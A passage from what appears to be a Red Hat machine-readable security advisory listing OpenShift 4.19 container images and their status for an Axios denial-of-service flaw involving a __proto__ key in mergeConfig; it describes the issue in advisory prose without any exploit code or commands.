"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:66dd0ff7ebdf89393607ed43af70c5b19d7d062c4715dedde645cf7cf00042c6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:6d0d678b8e234b026b11de75091fe5869edf76484325380a0bc2ea40d316828f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:72fc95856ec7db8a502bf2b09972d63f50671593a26366a9aa56d6153459fb79_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:35588ff05b4c23c28da38abaed98e46da42e24899bc6fe6b40508a77706a4a6b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:46bfd97dc7a9ceec42f309d5bc112e6eb8212b96278d70b5e67d4fd2f40170b7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:5015658d5bee0ff943bc69525816e23d34ca35ec3a818cf0130d58c8baea98b6_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:560aafed0881129dc2e59d0639cf2924f25ecfc9b4104b9a9700c0ece0693a76_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:2497f36ad41776147768069c63bab22f639770328273f69ef16473d41ce32278_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:269715c1fc118c5a352bb9a221e648f2fa24caabc0ae874d906e2947837b6a9a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:5a81fa31d2a53a7942e433df47983d0a9b17a3be01dc73802698a26c5a54557b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:5f6089d286cfa67bcf24b6860c840e503fe431f8df8557324d9fae2725ee6f0d_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:82412b7cf5683fb7a70749370015ea212339356d0443143e70ba439aba6d0b0f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:8e9affb2924d2c993f50e4baa132d3e3ddb4f1012154a80d9bf9114bddb10e49_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:9bb0d3806c90ff845c4dbe11678a15f2816a902e9fde4df463f3e85febdcfd8f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:d14dd6230f53078a6cf0d3b1528d0d22995add08578ab3da323a4ff92d13cc31_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:6f971e62173e3772bc6c474b3f796d93ef9f01e1d098705177f06a82f56601b9_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:988ab0315395f8580b26df4a0ebc13f53d47dd4bfb4160489f1d24c3c118c795_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:a51c6200b8f5a73c29e236c1a4ff59b61b54fe200fbed5f13d54583ea7f8f51e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:fc80f86e06eb2cc0fd6de0eebe896533169eb85bdd15e54b7b6a8e8722d3cf34_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:2d02a78de1b38dd1aa1159bffade3aaba19ee6ddf8b3a8f2b4a017cb2a6ea22e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:3f3e0469a0d159c94ffc5063f08fa8af255d1e620b359264211b196cb330eb4e_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:55f9b85e57f11e221edf4e30d65037caedd69a0a4d37d560d99225b992aa1cbb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:dbce78ed2734d0a9d61b3404fdcc6f4541b8dc5b95e4fb40b8f9157b002b2681_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:39dc4401c0fe4bdac4a4d5ff18880f92ce0cbf10e00208a564a50973ff2667b1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:50613490849c11ce84b306bf77e8fd0e2d5e8e74d0db805f1dd73e7877a3d8a4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:a0fa55daf82f32ede8a24f467db6f6591c5f5810f3dfa4c5b095fe5ba8274595_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:d17159405d993d6f0e812b36fc09809ae821807eadd5b9f1d448f4f188bd0e73_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:1de5b7823150dabafe0ca7d026012a02e03da9f95ebab9389d84f82c4fb83dc7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:b12d8b79849779424f3cffd8ff8da719904dadb5cdb018f0056f39b3ccb593f8_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:cba950803b92bd6bd4edf5f6e4c6f6f92cc899132e530d2508d142deeb9366cd_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:d5c61e25f1e62aab1c6a521f4184d3552fe23d82e3a080124bf8e38d4b2ba2cd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:68a9cd133540eed3257ca2d5fa6f8ef384c3f66cc3cb4a30c72228c3450bce49_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:92a4f2142815522fdeee0f26ed1841cb16c10ab93ec38512f64ce82a81a12bb6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:e80c61f3f591b4a682b352c787e1715f7d9f4f06e209ef8dc82e41b8bded9b8e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:f5f04cf85a80bba86be83c2fdd946e2efe511959a0ff382620bb9f7aa25b8c71_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:920a0d0905c6decac8fa8ae599192003df5391c6672f6c6f5eec3b6d9a8e0fee_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:a247fbc173026dc90407f375b79904dc8d29daecacd96333fa6ef80b3186e8eb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:a97b0c4ab3e8716aadd8773aac0e95cb23aaaf6b618a2f759a1a53ecf078345f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:fc7191fca813048d552379742516176d723b1b1616dd53dd5ac557d117437c7a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:2848880f87cf2488a841e371c990a81b83e44e08e7e4b1599c2009f078080d85_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:5ec6c4b928751540b436763b99127acafab69b5dfc867cd4cf74871697327698_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:730d5918dbf2f364e8528b6c8036541fbbee9e81c1bd5f6985f87b4602bc4579_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:9fe8545ad96791b55050941f86c99eef5b8b88b927c0e1953ce3ee703b6bf525_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:233b4ee8499922834ec87e62c2d4f322062f8063c99a95010bcf817e6114af6e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:337f863c631718a87bb7c6f86491aab519c0885ab1fe4184dd33df493da56386_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:350c76802bc5210c06f8ee9ac9a4a7f2474505132c1eab2607bfab309f59e5f3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:43aa5f0fe9244c1aaf3912b184ffee644522a2ff3bd3aadd53db5b90b0c93c76_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:28f0a87cf08f7f9134bbe4ca64a7bc38a8882ecb5c8c6d57d5bb8f9096cdb76b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:4a986e828ec8120aa34ff2e35fe51c1866af855ea48e21d41aaeddcb4563a5d7_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:8fc1c4e8704ed03a5515293ed3b18f9cf2f72b57bf97f6f646f0c4b7dfd47d65_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:c8a812560939b0a79d1b687f36dd5c5b71d01bea059b07e3652b35678884d330_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:515b6d09bed60aa703612507005248bbda01c940605101e93897805a7f1e4666_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:b36db241db3e48fdc932865032dbedaf9d94816523648f4345f19acba26cd7f4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:e8b6d45610b94825d1f5525443529e99a5e68441a8f331e20746614a606dc475_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:f3405b744680f7e937609958ff100453abb5a7cff06344997be0b0a7b7fa29e3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:0df3b71023897418a185bfc7a38f4f67e0a41b6733452fefd59c9d7edbec3df6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:49afa7e1da94ce712c27df4a3e01d4748b2a493b4c61527a8a895c24e3001648_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:afbb2ca0948d8280647626e33064e6fc0d72310244cd69e338efdcc1b1ea7c8b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:e689a8391301d7ce3ba922d5fee8624e5d7f9c7a23905f78a7171d9a182d3f1c_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:93ddc3e527257964b98d041a3d830c1be67f8c781f93d562c328c1dee7b37ef1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:97611bba51f02868cd922555e6c8e75d7eb4b5d8a865a69fd957084f897a5033_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:3a47a587be70333ba3719bb416fb04c176e41ce27d2c051b1210717857fd9b92_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:d48293acc1ecfd8e08eed3f47d3c37eb9d5905642a04e12ed26434a222ed0476_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:25f2667e3ce28ce5f0326be23f78cc6eedd523d4d2cdcfee2c02565d14d16ec2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:ec8e975cdae392efc948e02d0a30b98809739aff380a856ec97e0367fd1d0179_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:70ec66ac0b28bc34120378d962fdfe8a2f2411591611eaf6df7d4e62b8076a7f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:cc3b4055bc35dcc6c701bca3092202adbdbf5edefe3737167475ee2431fc30c1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:2b9e95c24afe6cdf775027984310e0388433100034ef17e8de50160370019063_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:47e0ce843654534a810ad00a3b0703d8abbf4b8f221c479bae47cceed4d944e1_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:6c081df14b51b5bffaaf126426c8919de0821a460c3a7ec80abf95581b749609_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:7f52c583cdba43b214630766d8f050b322c936307f28e1951b47d2fdecd11acb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:470582fb21bf68d82be5cb2548bb4fd55827624330297d62b246a69b831153cd_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:a362b4e6bd7979c2413fe2bed3f66be4a44508bf397115caa539fa0857e26527_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:c0935ced156f72b3a6a77ff11445c038bd0555d881b73c760c7291cc7d27749b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:f434571500312f9a43f76fb244efb3184388fa6c34e955228612364918c8f1c8_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:5fa811100ce565454ba1e243b9d0b94ca6f9f630fe159d4a7de104eb844039e8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:a40105662b9188d283206418a2884182a9aff74c2cf4f700df3bd69443773d8c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:bde91bb377421a028e30bb830721f120be505c245717b5e2a3e25e5e6754bd5a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:e4ca2b3866c381b5fbbf8f6be7f9a34f4dd86ef1f952624e28760ce20ca3be64_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:07c0eed66aca1eed3b7897a24d97c00cb77f592f9b6900c7fb2644b4cfae6797_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:399d1be8fdde89d24d645044e04a0f5c0c105629896692c5e856a69d1bc6b076_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:62e2f95a2e6d53f00bfed8b866c40378bfb1219b72ba6b4e9478d4753fcfa623_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:7f8f9a3bce37f846d92e13388b17cff7e606c59abf74b88e8932cc4eb17f5828_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:395c76d76ca411005e4edc332331e1e36152ac788e1a54a02975ad3478a7f5de_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:53d9fba19f9ae47a65713eb4127c1f0c672a04cb55ec52861af3124dd2fe1e30_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:ceceb8b787ae6f1e9f00e32e4914456ae8dfe3f47c50efbf55ed0d1bb3f6c78a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:f99105f06107aae1f680d94d03d2f90607286c026aca50a877063235773368c7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:6f39433829144540b1030be91fecb0b225ec0212fe0e63f4ff50c7d1e9461a38_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:6fc27364a010efdbaeb7ede2c4aeaf867a8743d4fa9af5f9b6a16149f945de69_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:8ce1023bff832cada7cd5754986f8f2a7e24df72eee17707ff6df3acdab58465_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:e838bcfd2b1e7bb1376baff2a9e83cfb712b35be02767f62f10acc4edf5b4890_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:4371bbcc4e87a108d9c6f2121c9120a5abcf32240f2c5b8fa4d9ff9023821d81_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:4f7944def4efb736d1bb91507ce49497840db06495408913b57591fd2f72ed22_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:bb6e5818c800f72e4318c715666b51239050a3e7a7b6e7fdf96ec3b343a419af_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:cfd82e42cdba7e0724a9b0c5b90d42d526913ac96104e3ab6b449b59c3f5f3ad_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:355c8c7080214dbcd15bf77122550909eda1b1a5a1bcbc695ce80a495518b066_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:38a241d766a8321cfda212df868c63751fab60d99d8f05c671c07b39fc2dd2bf_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:4efb83eb7fca945c2f8bbb8c141c87bd4b7c4bd1ad09998e0e52259bcda88bd2_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:81ae7211c791e2b2e8f9ae37ba0c935e1b8dc8edef9c412058519e813518e6e7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:37a306bd6ec2676ed92426fc7e69cc2a3169013c31997f1144a1f22750309582_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:42985904fd805f7e3afeb21e514100045bc0fc77b7f7a8b81ce63c892d7eba70_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:6b6894e000302c61bc4eb20795f86491c14cddc1110e2534442b399d0e22ebdf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:a97fadbd51c77b4a854ecf0c403936adbf136dc83af3213fcc35fd6d5d67679e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:132bb73fc0ee5add8ea39eda9e4acfc0e3fab4ab85d2fb959e9a359dfe2b7b79_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:30c2d5c0f6ccd61860e95309dc27f8a1412cc6cf6173fef9a48461186f296336_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:6440ce5a0f8c34fea0b65fd43d8415c03d2c8c074f47efab4a2e47182a126c38_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:8c4b496454f9e8fe0bc85b5d4feb01c4c8ea0935d946b900ada2531d2c294ed3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:458198718ad90fe2caed08f8ae82b2ce996d62cc6455672db992e7f9bbacbcd3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:5e6e5206c98ab903f70b3e7402ac1d0c4342577038cb5810a268ba235502a717_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:60ec51c360f250cf70fdd2442b9def1ec17e2ded2cefe158995d701a0a7ec525_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:a116039d2376221a308ad495493553e704358e9cfc2fa4104785f7dd7242b90a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:05e68f45e8578ef2401473deda111a57de11143bb3cd63f84742cfc1bdbde1de_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:99d76e0fcc4bd0f276d574ea2edad252b552301aa10e2e4241e0e9462fdd03e7_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:d3fbf646c682c41b45e5ac529e3fa35abdb2610c2e746bfe19a7a12867165968_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:ff983c80717ff42cf4c6484fa4c38a1df4c88fd40d4e05fa3c47434d949d256b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9-operator@sha256:bcba79c5b4e0adf2cb63a96b2d7a089bc5a7ef0960ea5a54d50a36761ea7033e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9@sha256:79ffc4eed49cdd6aa9854d731ea9f85ed37af6e274c04359f048afea038ed48f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-cloud-controller-manager-rhel9@sha256:fdf18e2f91a8d7dfed9ab25f41666e1f3ff3c2a49866a1ff557629602b9f4726_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-cluster-api-controllers-rhel9@sha256:75c7ccaeda39a8ede8e78244478c7fb3dd03c1523ef3dcda8982cc8cc74a7aee_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9-operator@sha256:bcba79c5b4e0adf2cb63a96b2d7a089bc5a7ef0960ea5a54d50a36761ea7033e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9@sha256:79ffc4eed49cdd6aa9854d731ea9f85ed37af6e274c04359f048afea038ed48f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-csi-driver-syncer-rhel9@sha256:0d1f878c9d72ed2e0cf721f35015c55385df1eb3eb9bf966bb7d626f7826baf3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-problem-detector-rhel9@sha256:0925ab89d006b1b2665e701f3943ad2684e31ce86408919378014ecb7f7403ed_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:0f1cb5f6dd220cb36e689dfa996022085bafe7a06aa6b8f3e4737ca281e143c4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:27a24944f1ef11eb36634a670dc865b5ff0a15d2e11905b82498916d8e9bf580_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:dcffbfba5a93e392e08fb0d010fd9b75694c4411016d09852fc51239d5234e9d_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:fe3bfd4f788d5fe7258d04338de8ba9df4638db341674caed43859927f6ee3f9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:15d38afb007a612060445e5725ead06ed81130b761b11661e608a0debe464d24_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:4e69689cecf4ba62c9a3b7305e80c15ad5fcccbc85fb59a7e2969e14c7fb85f3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:a7a04880260ecec43abbfe7546f34ab6db488e82574cd7e9b0befa5399b601e8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:dbca06ba2c04ea72c1eb33a6c9d1c075016531eb9f72fc589fe759e55a57c408_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2438237"
}
],
"notes": [
{
"category": "description",
"text": "A denial of service flaw has been discovered in the Axios npm package. the mergeConfig function in axios crashes with a TypeError when processing configuration objects containing __proto__ as an own property. An attacker can trigger this by providing a malicious configuration object created via JSON.parse(), causing complete denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "axios: Axios affected by Denial of Service via __proto__ Key in mergeConfig",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:03d3c5b12eb66d08cacf9800def4bc0a0ca2561b8725fa897e943345e4bd441f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:210a2e800a6a8e3e7f577e3e8b62841d9c4fbf644d44fd927f66fee17709defc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:85748fc89666992382ee0059ff56f2ad103a2f066d2e84e270b8dd00fa699c45_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:c2c1f73f4ec1f7b91ebfc39a4282dddae2978a79150523a9c72748f50f7a2d89_arm64"
],
"known_not_affected": [
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a31c0d7654d2495710df721e8e1aa57ae47f028966ca83aaa1b74a5b57f0a276_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a657295bab1d29d15cdd77ce366dd388153b5783c054067ef0ecd1c84e76db4f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a95b88717fb16e809ea0b8654929e2808eb6fed3b84e45bbe3886e020d7acac4_ppc64le",
